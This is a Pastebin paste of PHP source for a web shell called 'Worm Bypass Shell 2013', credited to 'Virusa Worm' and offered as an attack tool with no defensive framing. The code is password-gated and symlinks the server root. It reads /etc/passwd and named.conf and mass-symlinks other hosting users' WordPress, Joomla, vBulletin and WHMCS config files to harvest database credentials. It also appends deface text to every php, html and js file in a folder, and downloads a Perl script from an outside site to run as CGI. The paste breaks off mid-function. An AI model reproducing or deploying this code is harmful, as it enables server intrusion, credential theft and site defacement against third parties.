Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php ?><?php
- // Coded by Virusa Worm //
- error_reporting(0);
- @set_time_limit(0);
- @session_start();
- $xSoftware = trim(getenv("SERVER_SOFTWARE"));
- $xServerName = $_SERVER["HTTP_HOST"];
- $xName = "Virusa Worm";
- $mlebu = "a6df8bf9aabd07789c1772de31ebbbde";
- $jajal = (md5($_POST['pass']));
- $rasane = 1;
- if ($jajal == $mlebu) {
- $_SESSION['login'] = "$jajal";
- }
- if ($rasane) {
- if (!isset($_SESSION['login']) or $_SESSION['login'] != $mlebu) {
- die("
- <html>
- <head>
- <title>Worm Bypass Shell 2013</title><link rel=\"shortcut icon\" href=\"http://www.iconj.com/ico/c/u/cu1bmpgb1k.ico\" type=\"image/x-icon\" />
- <style type=\"text/css\">
- body { background-color:#151515; color: rgb(0, 153, 0); }
- input{ margin:0; background-color:#151515; border:0px solid #151515; position:relative; bottom:75px; left:300pt;}
- input, select, textarea{ color: #151515; } textarea:focus, input:focus { color: #151515; }
- .fot{ font-family:Tahoma, Arial, sans-serif; color: #009900 ; font-size: 11pt; }
- .cont a{ text-decoration: none; color:rgb(0, 153, 0); font-family: Tahoma, Arial, sans-serif ; font-size: 16px; text-shadow: 0px 0px 3px ; }
- .cont a:hover{ color: #FF0000 ; text-shadow:0px 0px 3px #ff0000 ;}
- #menu a{ padding: 1px; border: 1px solid green; color: green; text-decoration: none;color: #009900; font-family: Tahoma, Geneva, sans-serif; font-size:12px; }
- #menu a:hover{ border: 1px solid red; color: red; }
- </style>
- </head><script> function myFunction() {alert(\"you must login first!\"); }</script>
- <body>
- <center><img src=\"http://i952.photobucket.com/albums/ae1/virusaworm/vwn_zps5e0de6b8.jpg\" /></center><br><div id=\"menu\" class=\"cont\" align=\"center\">
- <a href=\"\" onclick=\"myFunction()\"> Home </a> <a href=\"\" onclick=\"myFunction()\"> Symlink </a> <a href=\"\" onclick=\"myFunction()\"> Bypass </a> <a href=\"#\"> Mass </a> <a href=\"\" onclick=\"myFunction()\"> Tools </a> <a href=\"\" onclick=\"myFunction()\"> Upload </a> <a href=\"\" onclick=\"myFunction()\"> About </a> <a href=\"\" onclick=\"myFunction()\"> Logout </a> <a href=\"\" onclick=\"myFunction()\"> Kill </a></div> <br><br>
- <br><br><br><center><img src=\"http://i952.photobucket.com/albums/ae1/virusaworm/lg1_zpsa89e5212.jpg\" />
- <br><br><font color=\"#006600\" size=\"1pt\">Coded by </font><font color=\"#00aa00\" size=\"1pt\">Virusa Worm</font><br><br><font color=\"#00aa00\" size=\"1pt\">Worm Bypass </font><font face=\"Tahoma\" color=\"#b3b3b3\" size=\"1pt\">Shell 2013</font> <font color=\"#006600\" size=\"1pt\">include Several script which has recoded to make this shell.</font><br><br><font color=\"#006600\" size=\"1pt\">so.. try to figure it out if this shell not work in different server, and use ur brain.<br>learn to figure it out about something it\'s make be better.<br><br><font color=\"#b0b000\" size=\"1pt\">\"</font>tools not make hacker, but try to learn about tools. tried to find out why it\'s tool works. it\'s will be better than nothing.. <font color=\"#b0b000\" size=\"1pt\">\"</font><br><br><br><font color=\"#006600\" size=\"1pt\">Special thankz to : </font><br><font color=\"#009900\" size=\"1pt\">My best Brother Mauritania Attacker<br><br><font color=\"#006600\" size=\"1pt\">thankz to : </font><br>
- All Members AnonGhost Team - Tanpa Bicara - Maniak k4Sur </font><font color=\"#006600\" size=\"1pt\">[pasangan galo.. lol..]</font><br><br>Greetz to :</font><br><font color=\"#b0b000\" size=\"1pt\">AnonGhost - Mauritania HaCker Team - X-Blackerz INC - ZHC </font><font color=\"#006600\" size=\"1pt\"></center><br><br><center><form method=\"post\"><input type=\"password\" name=\"pass\"></form></center>
- <footer id=\"det\" style=\"position:fixed; left:0px; right:0px; bottom:0px; background:rgb(21,21,21); text-align:center; border-top: 1px solid #009900; border-bottom: 1px solid #009900\"><font color=#009900 size=1 face=\"Tahoma\">© Worm Bypass Shell 2013</font></footer>
- </body>
- </html>
- ");
- }
- }
- $pageURL = 'http://' . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"];
- $u = explode("/", $pageURL);
- $pageURL = str_replace($u[count($u) - 1], "", $pageURL);
- $pageFTP = 'ftp://' . $_SERVER["SERVER_NAME"] . '/public_html/' . $_SERVER["REQUEST_URI"];
- $u = explode("/", $pageFTP);
- $pageFTP = str_replace($u[count($u) - 1], "", $pageFTP);
- function checkAlexa($domain) {
- $clean = explode("/", $domain);
- $result = file_get_contents("http://data.alexa.com/data?cli=10&dat=snbamz&url=http://" . $clean[0]);
- $n = explode("<POPULARITY URL=\"" . $clean[0] . "/\" TEXT=\"", $result);
- @$rest = $n[1];
- $it = explode("\"", $rest);
- $alexa_rank = $it[0];
- if (@$alexa_rank != "") {
- return number_format($alexa_rank);
- } else {
- return "No Alexa";
- }
- }
- ?>
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <title>Worm Bypass Shell 2013</title><link rel="shortcut icon" href="http://www.iconj.com/ico/c/u/cu1bmpgb1k.ico" type="image/x-icon" />
- <style type="text/css">
- html,body { margin: 0; padding: 0; outline: 0; }
- a{ font-size: 12px; }
- body { direction: ltr; background-color:#151515; color: rgb(0, 153, 0); text-align: center } input,textarea,select{ font-weight: bold; color: #000000; }
- input,textarea,select:hover{ box-shadow: 0px 0px 4px #00cc00; }
- .hedr { font-family: Tahoma, Arial, sans-serif ; font-size: 22px; }
- .cont a{ text-decoration: none; color:rgb(0, 153, 0); font-family: Tahoma, Arial, sans-serif ; font-size: 16px; text-shadow: 0px 0px 3px ; }
- .cont a:hover{ color: #FF0000 ; text-shadow:0px 0px 3px #ff0000 ; }
- .cone a{ text-decoration: none; color:rgb(0, 153, 0); font-family: Tahoma, Arial, sans-serif ; font-size: 12px; text-shadow: 0px 0px 3px ; }
- .cone a:hover{ color: #FF0000 ; text-shadow:0px 0px 3px #ff0000 ; }
- .tmp tr td{ border: solid 1px #006600; padding: 2px ; font-size: 13px; }
- .tmp tr td a { text-decoration: none; }
- .foter{ font-size: 9pt; color: #006600 ; text-align: center }
- .tmp tr td:hover{ box-shadow: 0px 0px 4px #00cc00; }
- .fot{ font-family:Tahoma, Arial, sans-serif; color: #009900 ; font-size: 11pt; }
- .for a : hover{ color: #FF0000 ; text-shadow: 0px 0px 1px #FF0000; }
- .ir { color: #FF0000; }
- #menu a{ padding: 1px; border: 1px solid green; color: green; text-decoration: none;color: #009900; font-family: Tahoma, Geneva, sans-serif; font-size:12px; }
- #menu a:hover{ border: 1px solid red; color: red; }
- </style>
- </head>
- <body>
- <div class='all'>
- <?php
- @mkdir('sim', 0777);
- $htcs = "Options all
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any";
- $f = @fopen('sim/.htaccess', 'w');
- fwrite($f, $htcs);
- @symlink("/", "sim/rut");
- $pg = basename('index.php');
- echo '<center>' . base64_decode("PGltZyBzcmM9Imh0dHA6Ly9pOTUyLnBob3RvYnVja2V0LmNvbS9hbGJ1bXMvYWUxL3ZpcnVzYXdvcm0vdnduX3pwczVlMGRlNmI4LmpwZyIgLz4=") . '</center>';
- echo '<div id="menu" class="cont" align="center">
- <a href="?"> Home </a>
- <a href="?vw=sime"> Symlink </a>
- <a href="?vw=baipas"> Bypass </a>
- <a href="?vw=mase"> Mass </a>
- <a href="?vw=tule"> Tools </a>
- <a href="?vw=aplot"> Upload </a>
- <a href="?vw=abot"> About </a>
- <a href="?vw=metu"> Logout </a>
- <a href="?vw=mati"> Kill </a>
- </div>
- <font color="009900" face="Tahoma, Geneva, sans-serif" style="font-size: 8pt">
- ';
- echo '<hr color=#"006600" width="75%">';
- if (ini_get('safe_mode') == '1') {
- echo '<font color="#006600"> Safe mode:</font><font color="red"> ON </font></font>';
- } else {
- echo '<font color="#006600"> Safe mode:</font><font color="00bb00"> OFF </font>';
- }
- if (ini_get('magic_quotes_gpc') == '1') {
- echo '<font color="#006600"> Magic_quotes_gpc:</font><font color="red"> ON </font>';
- } else {
- echo '<font color="#006600"> Magic_quotes_gpc:</font><font color="00bb00"> OFF </font>';
- }
- if (function_exists('mysql_connect')) {
- echo '<font color="#006600"> Mysql:</font><font color="00bb00"> ON </font>';
- } else {
- echo '<font color="#006600"> Mysql:</font><font color="red"> OFF </font>';
- }
- if (function_exists('mssql_connect')) {
- echo '<font color="#006600"> Mssql:</font><font color="00bb00"> ON </font>';
- } else {
- echo '<font color="#006600"> Mssql:</font><font color="yellow"> OFF </font>';
- }
- if (function_exists('pg_connect')) {
- echo '<font color="#006600"> PostgreSQL:</font><font color="00bb00"> ON </font>';
- } else {
- echo '<font color="#006600"> PostgreSQL:</font><font color="yellow"> OFF </font>';
- }
- if (function_exists('ocilogon')) {
- echo '<font color="#006600"> Oracle:</font><font color="00bb00"> ON </font>';
- } else {
- echo '<font color="#006600"> Oracle:</font><font color="yellow"> OFF </font>';
- }
- if (function_exists('curl_version')) {
- echo '<font color="#006600"> Curl:</font><font color="00bb00"> ON </font>';
- } else {
- echo '<font color="#006600"> Curl:</font><font color="red"> OFF </font>';
- }
- if (function_exists('exec')) {
- echo '<font color="#006600"> Exec:</font><font color="00bb00"> ON </font>';
- } else {
- echo '<font color="#006600"> Exec:</font><font color="red"> OFF </font>';
- }
- if (!ini_get('open_basedir') != "on") {
- echo '<font color="#006600"> Open_basedir:</font><font color="red"> OFF </font>';
- } else {
- echo '<font color="#006600"> Open_basedir:</font><font color="00bb00"> ON </font>';
- }
- if (!ini_get('ini_restore') != "on") {
- echo '<font color="#006600"> Ini_restore:</font><font color="red"> OFF </font>';
- } else {
- echo '<font color="#006600"> Ini_restore:</font><font color="00bb00"> ON </font>';
- }
- if (function_exists('symlink')) {
- echo '<font color="#006600"> Symlink:</font><font color="00bb00"> ON </font>';
- } else {
- echo '<font color="#006600"> Symlink:</font><font color="red"> OFF </font>';
- }
- if (function_exists('file_get_contents')) {
- echo '<font color="#006600"> file_get_contents:</font><font color="00bb00"> ON </font>';
- } else {
- echo '<font color="#006600"> file_get_contents:</font><font color="red"> OFF </font>';
- }
- if (is_dir('sim/rut')) {
- echo '<font color="#006600"> Permission denied:</font><font color="00bb00"> ON </font>';
- } else {
- echo '<font color="#006600"> Permission denied:</font><font color="red"> OFF </font>';
- }
- echo '<hr color=#"006600" width="75%">';
- if (isset($_REQUEST['vw'])) {
- switch ($_REQUEST['vw']) {
- case 'sec':
- echo '<br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Domains Script</font></b><br><br>';
- if (!@is_file('named.txt')) {
- $d00m = @file("/etc/named.conf");
- } else {
- $d00m = @file("named.txt");
- }
- if (!$d00m) {
- die("<meta http-equiv='refresh' content='0; url=?vw=read'/>");
- } else {
- echo "<div class='tmp'>
- <table align='center' width='40%'><td> <font color='#b3b3b3'><b>Domains </b></font></td><td> <font color='#b3b3b3'><b>Script</b></font> </td>";
- foreach ($d00m as $dom) {
- flush();
- flush();
- if (eregi("zone", $dom)) {
- @preg_match_all('#zone "(.*)"#', $dom, $domvw);
- flush();
- if (@strlen(trim($domvw[1][0])) > 2) {
- $user = @posix_getpwuid(@fileowner("/etc/valiases/" . $domvw[1][0]));
- $wpl = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/wp-config.php";
- $wpp = @get_headers($wpl);
- $wp = $wpp[0];
- $wp2 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/blog/wp-config.php";
- $wpp2 = @get_headers($wp2);
- $wp12 = $wpp2[0];
- $jo1 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/configuration.php";
- $joo = @get_headers($jo1);
- $jo = $joo[0];
- $jo2 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/joomla/configuration.php";
- $joo2 = @get_headers($jo2);
- $jo12 = $joo2[0];
- $vb1 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/includes/config.php";
- $vbb = @get_headers($vb1);
- $vb = $vbb[0];
- $vb2 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/vb/includes/config.php";
- $vbb2 = @get_headers($vb2);
- $vb12 = $vbb2[0];
- $vb3 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/forum/includes/config.php";
- $vbb3 = @get_headers($vb3);
- $vb13 = $vbb3[0];
- $wh1 = $pageURL . "/sim/rut/home/" . $user['name'] . "public_html/clients/configuration.php";
- $whh2 = @get_headers($wh1);
- $wh = $whh2[0];
- $wh2 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/support/configuration.php";
- $whh2 = @get_headers($wh2);
- $wh12 = $whh2[0];
- $wh3 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/client/configuration.php";
- $whh3 = @get_headers($wh3);
- $wh13 = $whh3[0];
- $wh5 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/submitticket.php";
- $whh5 = @get_headers($wh5);
- $wh15 = $whh5[0];
- $wh4 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/client/configuration.php";
- $whh4 = @get_headers($wh4);
- $wh14 = $whh4[0];
- $pos = strpos($wp, "200");
- $config = " ";
- if (strpos($wp, "200") == true) {
- $config = "<div class='cone'><a href='" . $wpl . "' target='_blank'>Wordpress</a></div>";
- } elseif (strpos($wp12, "200") == true) {
- $config = "<div class='cone'><a href='" . $wp2 . "' target='_blank'>Wordpress</a></div>";
- } elseif (strpos($jo, "200") == true and strpos($wh15, "200") == true) {
- $config = " <div class='cone'><a href='" . $wh5 . "' target='_blank'>WHMCS</a></div>";
- } elseif (strpos($wh12, "200") == true) {
- $config = "<div class='cone'> <a href='" . $wh2 . "' target='_blank'>WHMCS</a></div>";
- } elseif (strpos($wh13, "200") == true) {
- $config = "<div class='cone'> <a href='" . $wh3 . "' target='_blank'>WHMCS</a></div>";
- } elseif (strpos($jo, "200") == true) {
- $config = " <div class='cone'><a href='" . $jo1 . "' target='_blank'>Joomla</a></div>";
- } elseif (strpos($jo12, "200") == true) {
- $config = " <div class='cone'><a href='" . $jo2 . "' target='_blank'>Joomla</a></div>";
- } elseif (strpos($vb, "200") == true) {
- $config = " <div class='cone'><a href='" . $vb1 . "' target='_blank'>vBulletin</a></div>";
- } elseif (strpos($vb12, "200") == true) {
- $config = " <div class='cone'><a href='" . $vb2 . "' target='_blank'>vBulletin</a></div>";
- } elseif (strpos($vb13, "200") == true) {
- $config = " <div class='cone'><a href='" . $vb3 . "' target='_blank'>vBulletin</a></div>";
- } else {
- continue;
- }
- flush();
- flush();
- $site = $user['name'];
- flush();
- echo "<tr><td><div class='cone'><a href=http://www." . $domvw[1][0] . "/>" . $domvw[1][0] . "</a></div></td>
- <td><div class='cone'>" . $config . "</div></td></tr>";
- flush();
- }
- }
- }
- }
- echo "</table></div><br><br>";
- break;
- case 'sime':
- echo '<br><br><br><br><b class="cont" align="center">
- <a href="?vw=sym">Symlink Server</a><br><br>
- <a href="?vw=sec">Domains Script</a><br><br>
- <a href="?vw=file">Symlink Manual</a></b><br>';
- break;
- case 'baipas':
- echo '<br><br><br><br><b class="cont" align="center">
- <a href="?vw=passwd">Bypass /etc/passwd</a><br><br>
- <a href="?vw=cgipl">Bypassed Perl Security</a><br><br>
- <a href="?vw=bforb">Bypass Forbidden</a><br><br>
- <a href="?vw=posget">Bypass posix_getpwuid</a><br><br>
- </b>';
- break;
- case 'mase':
- echo '<br><br><br><br><b class="cont" align="center">
- <a href="?vw=joomla">Mass Joomla</a><br><br>
- <a href="?vw=masde">Mass Deface</a><br><br>
- <a href="?vw=vb">Mass vBulletin</a><br><br>
- <a href="?vw=wp">Mass WordPress</a>
- </b>';
- break;
- case 'tule':
- echo '<br><br><br><br><b class="cont" align="center">
- <a href="?vw=vgrab">Config Grabber</a><br><br>
- <a href="?vw=cari">Find Directory Writable/Readable</a><br><br>
- </b>';
- break;
- case 'cari':
- echo '<center /><br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Find Directory Writable/Readable</b></p><br>' . $end;
- function read_dir($path) {
- global $count;
- if ($handle = opendir($path)) {
- while (false !== ($file = readdir($handle))) {
- $dr = "$path$file/";
- if (($file != '.') and ($file != '..') and is_dir($dr)) {
- if (is_readable($dr) and is_writeable($dr)) {
- echo "[RW] " . $dr . "<br>
- ";
- $count++;
- }
- read_dir($dr);
- }
- }
- }
- }
- $count = 0;
- set_time_limit(0);
- @$passwd = fopen('/etc/passwd', 'r');
- if (!$passwd) {
- echo "<center><font color='#ff0000' size='2pt' />[-] No Access to /etc/passwd
- </center>";
- exit;
- }
- $path_to_public = array();
- echo "<html><center><font color='#009900' size='2pt' />
- ";
- while (!feof($passwd)) {
- $str = fgets($passwd);
- $pos = strpos($str, ":");
- $username = substr($str, 0, $pos);
- $dirz = "/home/$username/public_html/";
- if (($username != "")) {
- if (is_readable($dirz)) {
- array_push($path_to_public, $dirz);
- if (is_writeable($dirz)) {
- $count++;
- echo "<font color=white>[</font><font color=yellow>R</font><font color=green>W</font><font color=white>]</font> " . $dirz . "<br><br><br>
- ";
- } else echo "<font color=white>[</font><font color=yellow>R</font><font color=white>]</font> " . $dirz . "<br>
- ";
- }
- }
- }
- echo "<font color=red size=2pt>[+]</font> <font color=#009900 size=2pt>Found </font><font color=yellow size=2pt>" . sizeof($path_to_public) . "</font> <font color=#009900 size=2pt>readable public_html directories.</font><br><br>
- ";
- if (sizeof($path_to_public) != '0') {
- foreach ($path_to_public as $path) {
- }
- echo "<font color=red size=2pt>[+]</font> <font color=#009900 size=2pt>Found</font><font color=yellow size=2pt> " . $count . " </font><font color=#009900 size=2pt>writable directories.</font>
- ";
- echo "</center></html>";
- }
- break;
- case 'cgipl':
- echo '<br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Bypassed Perl Security</b>';
- echo '<center><form method=post><br><br>
- <input type=submit name=su value="Bypass" /></form></center>';
- error_reporting(0);
- if (isset($_POST['su'])) {
- mkdir('wper', 0755);
- $rr = " Options +ExecCGI
- AddType application/x-httpd-cgi .sh
- AddHandler mod_python .sh
- AddHandler mod_perl .sh
- AddHandler cgi-script .sh
- AddType application/x-httpd-cgi .pl
- AddHandler cgi-script .pl
- AddHandler cgi-script .pl ";
- $g = fopen('wper/.htaccess', 'w');
- fwrite($g, $rr);
- $wper = symlink("/", "wper/vw.pl");
- mkdir('wper', 0755);
- $file = file_get_contents('http://www.ppteo.es/wp-content/languages/es_ES.txt');
- $g = fopen('wper/vw.pl', 'w');
- fwrite($g, $file);
- fclose($g);
- chmod("vw.pl", 0755);
- $wper = symlink("/", "wper/vw.pl");
- fwrite($f, $r);
- $consym = "<b class='cont' align='center'><a href=wper/vw.pl target='_blank'><font color=#ff0000 size=2 face=\"Courier New\">Click here to open</font></a></b><br>";
- echo "<center><br><br>Perl Bypassed Successfully<br><br><font color=#58FAF4 size=2 face=\"Courier New\">$consym</font></center>";
- }
- break;
- case 'vgrab':
- echo "<br><b class='cont' align='center'><font face='Tahoma' color='#009900' size='3pt'>Configs Grabber</b>"; ?><center><?php if (empty($_POST['config'])) { ?><p><font face="Tahoma" color="#009900" size="2pt">/etc/passwd content</p><form method="POST"><textarea name="passwd" class='output' rows='15' cols='60'><?php echo file_get_contents('/etc/passwd'); ?></textarea><br><br><input name="config" class='inputzbut' size="100" value="Fvck'em!" type="submit"><br></form></center><br><?php
- }
- if ($_POST['config']) {
- $function = $functions = @ini_get("disable_functions");
- if (eregi("symlink", $functions)) {
- die('<error>Symlink is disabled :( </error>');
- }
- @mkdir('vwconfig', 0755);
- @chdir('vwconfig');
- $htaccess = "
- Options all
- Options +Indexes
- Options +FollowSymLinks
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any
- ";
- file_put_contents(".htaccess", $htaccess, FILE_APPEND);
- $passwd = $_POST["passwd"];
- $passwd = explode("
- ", $passwd);
- echo "<br><br><center><font color=#009900 size=2pt>wait ...</center><br>";
- foreach ($passwd as $pwd) {
- $pawd = explode(":", $pwd);
- $user = $pawd[0];
- @symlink('/home/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt');
- @symlink('/home/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt');
- @symlink('/home/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt');
- @symlink('/home/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt');
- @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt');
- @symlink('/home/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt');
- @symlink('/home/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt');
- @symlink('/home/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt');
- @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt');
- @symlink('/home/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt');
- @symlink('/home/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt');
- @symlink('/home/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt');
- @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
- @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
- @symlink('/home/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
- @symlink('/home/' . $user . '/public_html/home/wp-config.php', $user . '-wp-home.txt');
- @symlink('/home/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt');
- @symlink('/home/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
- @symlink('/home/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
- @symlink('/home/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt');
- @symlink('/home/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
- @symlink('/home/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt');
- @symlink('/home/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
- @symlink('/home/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
- @symlink('/home/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
- @symlink('/home/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
- @symlink('/home/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
- @symlink('/home/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
- @symlink('/home/' . $user . '/public_html/home/configuration.php', $user . '-joomla-home.txt');
- @symlink('/home/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt');
- @symlink('/home/' . $user . '/public_html/whm/configuration.php', $user . '-whm15.txt');
- @symlink('/home/' . $user . '/public_html/central/configuration.php', $user . '-whm-central.txt');
- @symlink('/home/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
- @symlink('/home/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
- @symlink('/home/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
- @symlink('/home/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmcs.txt');
- @symlink('/home/' . $user . '/public_html/support/configuration.php', $user . '-support.txt');
- @symlink('/home/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
- @symlink('/home/' . $user . '/public_html/submitticket.php', $user . '-whmcs2.txt');
- @symlink('/home/' . $user . '/public_html/whm/configuration.php', $user . '-whm.txt');
- }
- echo '<div class="cone"><font face="Tahoma" color="#009900" size="2pt">Done -> <a href="vwconfig">Open configs</a></font></div>';
- }
- break;
- case 'masde':
- echo '<br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Mass Deface</font></b><br><br>';
- if (!isset($_GET['code'])) {
- echo '<font face="Tahoma" color="#009900" size="2pt"><form action="" method="get">
- <input type="hidden" name="action" value="mass">
- <textarea cols="75" rows="15" name="code" id="source">Defaced by Virusa Worm.. lol..</textarea><br><br>
- <center><font color="#006600">Folder: </font> <input size="60" type="text" value="' . getcwd() . '" name="dir" style="border-top:none;"> <input type="submit" value="Deface it !" style="border-top:none;"></center>
- </form>';
- } else {
- if (is_dir($_GET['dir'])) {
- $lolinject = $_GET['code'];
- foreach (glob($_GET['dir'] . "/*.php") as $injectj00) {
- $fp = fopen($injectj00, "a+");
- if (fputs($fp, $lolinject)) {
- echo $injectj00 . ' was injected<br>';
- } else {
- echo '<font color=red>failed to inject ' . $injectj00 . '</font>';
- }
- }
- foreach (glob($_GET['dir'] . "/*.html") as $injectj00) {
- $fp = fopen($injectj00, "a+");
- if (fputs($fp, $lolinject)) {
- echo $injectj00 . ' was injected<br>';
- } else {
- echo '<font color=red>failed to inject ' . $injectj00 . '</font>';
- }
- }
- foreach (glob($_GET['dir'] . "/*.htm") as $injectj00) {
- $fp = fopen($injectj00, "a+");
- if (fputs($fp, $lolinject)) {
- echo $injectj00 . ' was injected<br>';
- } else {
- echo '<font color=red>failed to inject ' . $injectj00 . '</font>';
- }
- }
- foreach (glob($_GET['dir'] . "/*.asp") as $injectj00) {
- $fp = fopen($injectj00, "a+");
- if (fputs($fp, $lolinject)) {
- echo $injectj00 . ' was injected<br>';
- } else {
- echo '<font color=red>failed to inject ' . $injectj00 . '</font>';
- }
- }
- foreach (glob($_GET['dir'] . "/*.js") as $injectj00) {
- $fp = fopen($injectj00, "a+");
- if (fputs($fp, $lolinject)) {
- echo $injectj00 . ' was injected<br>';
- } else {
- echo '<font color=red>failed to inject ' . $injectj00 . '</font>';
- }
- }
- foreach (glob($_GET['dir'] . "/*.aspx") as $injectj00) {
- $fp = fopen($injectj00, "a+");
- if (fputs($fp, $lolinject)) {
- echo $injectj00 . ' was injected<br>';
- } else {
- echo '<font color=red>failed to inject ' . $injectj00 . '</font>';
- }
- }
- } else { //end if inputted dir is real -- if not, show an ugly red error
- echo '<b><font color=red>' . $_GET['pathtomass'] . ' is not available!</font></b>';
- } // end if inputted dir is real, for real this time
- }
- break;
- case 'posget':
- echo '<br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Bypass posix_getpwuid</b><br><br>';
- echo '<form method="POST">
- <input size="20" value="0" name="min" type="text">
- <font face="Tahoma" color="#008800" size="2pt">to </font>
- <input size="20" value="1024" name="max" type="text"> <input value="Symlink" name="" type="submit">
- </form><br>';
- if ($_POST) {
- $min = $_POST['min'];
- $max = $_POST['max'];
- echo "<div class='tmp'><table align='center' width='40%'><td><font color='#b3b3b3'><b>Domains</b></font></td><td><font color='#b3b3b3'><b>Users</b></font></td><td><font color='#b3b3b3'><b>Symlink</b> </font></td>";
- $p = 0;
- error_reporting(0);
- $list = scandir("/var/named");
- for ($p = $min;$min <= $max;$p++) {
- $user = posix_getpwuid($p);
- if (is_array($user)) {
- foreach ($list as $domain) {
- if (strpos($domain, ".db")) {
- $domain = str_replace('.db', '', $domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/" . $domain));
- if ($owner['name'] == $user['name']) {
- $i+= 1;
- $cheechee = checkAlexa($domain);
- echo "<tr><td class='cone'><a href='http://" . $domain . " '>" . $domain . "</a> <font color='#d0d000'>- </font><font color='#b3b3b3'>" . $cheechee . "</font></td><center><td class='cone'><font color='#d0d000'>" . $user['name'] . "</font></center></td><td class='cone'><center><a href='sim/rut" . $owner['dir'] . "/public_html/' target='_blank'>Dir</a></center></td>";
- }
- }
- }
- }
- }
- echo "<center><font face='Tahoma' color='#d0d000' size='2pt'>Total Domains Found:</font><font face='Tahoma' color='#d0d000' size='2pt'> " . $i . "</font></center><br />";
- }
- echo "</table></div><br><br>";
- break;
- case 'bforb':
- echo '<br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Bypass Forbidden Server</b><br>';
- mkdir('bforb', 0755);
- chdir('bforb');
